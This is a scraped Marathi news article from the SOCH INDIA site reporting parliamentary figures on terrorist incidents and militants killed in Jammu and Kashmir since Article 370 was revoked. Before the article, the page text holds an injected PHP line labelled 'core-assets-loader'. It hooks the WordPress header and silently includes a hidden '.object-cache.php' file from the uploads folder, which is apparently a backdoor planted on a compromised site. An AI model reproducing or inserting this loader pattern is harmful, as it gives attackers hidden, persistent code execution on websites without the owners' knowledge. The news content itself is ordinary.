add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जम्मू-काश्मीरमध्ये आठ महिन्यात ४९ दहशतवाद्यांचा खात्मा – SOCH INDIA
Menu

देश
जम्मू-काश्मीरमध्ये आठ महिन्यात ४९ दहशतवाद्यांचा खात्मा

nobanner

जम्मू-काश्मीरमध्ये कलम ३७० हटवण्यात आल्यापासून आतापर्यंत ७९ दहशतवादी घटना घडल्या असुन, यामध्ये ४९ दहशतवाद्यांचा खात्मा झाला असल्याची माहिती गृह राज्यमंत्री जी किशन रेड्डी यांनी आज (मंगळवार) लोकसभेत दिली. तसेच, ५ ऑगस्ट २०१९ व १० मार्च २०२० दरम्यान देशांतर्गत भागात कोणताही मोठा दहशतवादी हल्ला झाला नसल्याचेही त्यांनी सांगितले.

फेब्रुवारी – २०१९ मध्ये जम्मू-काश्मीरमधील पुलवामात सीआरपीएफच्या पथकावर झालेल्या दहशतवादी हल्ल्याचा तपास सुरू असल्याचे रेड्डी यांनी यावेळी सांगितले आहे. या हल्ल्यात सीआरपीएफचे ४० जवान शहीद झाले होते.

या अगोदर रेड्डी म्हणाले, मागील तीन वर्षांत जम्मू-काश्मीरमध्ये दहशतवादाच्या १५०० पेक्षा अधिक घटना समोर आल्या आहेत. तसेच, देशाच्या उर्वरीत भागात नोव्हेंबर २०१८ मध्ये अमृतसरमधील ग्रेनेड हल्ला सोडला तर कोणताही मोठा दहशतवादी हल्ला झाला नाही.

जम्मू-काश्मीरमध्ये २०१७ ते २०१९ दरम्यान १५५० दहशतवादी घटना समोर आल्या आणि या कालावधीत २५१ जवान शहीद झाले. ११८ नागरिकांचा मृत्यू झाला तर ६२७ दहशतवाद्यांचा खात्मा करण्यात आला असल्याची त्यांनी रेड्डी यांनी माहिती दिली होती.